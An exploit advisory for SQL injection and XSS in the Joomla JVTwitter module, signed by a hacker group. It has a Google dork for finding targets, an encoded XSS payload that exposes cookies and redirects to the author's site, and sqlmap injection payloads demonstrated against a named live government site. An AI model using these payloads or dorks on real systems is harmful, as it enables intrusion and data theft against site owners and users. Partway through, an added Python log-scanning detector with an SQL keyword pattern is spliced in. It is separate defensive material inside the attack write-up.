Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
#############################################################
# Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
# Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id=
# Date: 2020-11-07
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: joomlavi.com
# Software Version: *
# Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html
# Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android
#############################################################
[*] Vuln Info:
==============
SQL injection is a code injection technique used against data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Cross-site scripting (XSS) is an attack in which an attacker places malicious client-side code into a web page.
Attackers use XSS vulnerabilities to steal user data, take control of user sessions, run malicious code, or as a major component of phishing scams.
#############################################################
[*] Exploit:
============
/modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I]
/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
#############################################################
[*] Demo:
=========
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=110 AND 6499=6499-- xBNX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel
---
[08:01:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
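Both issues above are reached through the `id` parameter of `jvtwitter.php`, which the advisory shows as a number in normal use, so any request to that script with a non-integer `id` is worth flagging in web server logs. The Python code below is an added example, not part of the original advisory; the combined access log format, the constructed sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path as given in the advisory (Joomla may be installed in a subdirectory).
TARGET = "/modules/mod_jvtwitter/jvtwitter.php"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_RE = re.compile(r"\b(and|or|select|union|concat|sleep)\b|--|/\*", re.I)

# Constructed sample log lines (documentation IP addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2020:08:00:01 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110 HTTP/1.1" 200 512',
    '192.0.2.44 - - [07/Nov/2020:08:01:02 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110%20AND%206499%3D6499--%20xBNX HTTP/1.1" 200 512',
    '192.0.2.44 - - [07/Nov/2020:08:01:09 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3Cimg%20src%3Dx%3E HTTP/1.1" 200 498',
    '192.0.2.44 - - [07/Nov/2020:08:01:15 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 900',
    '192.0.2.51 - - [07/Nov/2020:08:02:30 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110abc HTTP/1.1" 200 512',
]

def classify_id(value):
    """Return 'ok' for a plain integer id, otherwise a coarse reason label."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    if re.search(r"[<>\"']", value):
        return "markup-or-quote"
    if SQL_RE.search(value):
        return "sql-syntax"
    return "non-numeric"

def suspicious_requests(lines):
    """Yield (line_number, reason) for jvtwitter.php hits whose id is not an integer."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(TARGET):
            continue
        # parse_qs percent-decodes once; keep blank values so "id=" is still seen.
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", [""]):
            # Decode a second time so double-encoded input is classified too.
            reason = classify_id(unquote(raw))
            if reason != "ok":
                yield n, reason
                break

if __name__ == "__main__":
    for lineno, reason in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```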
#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1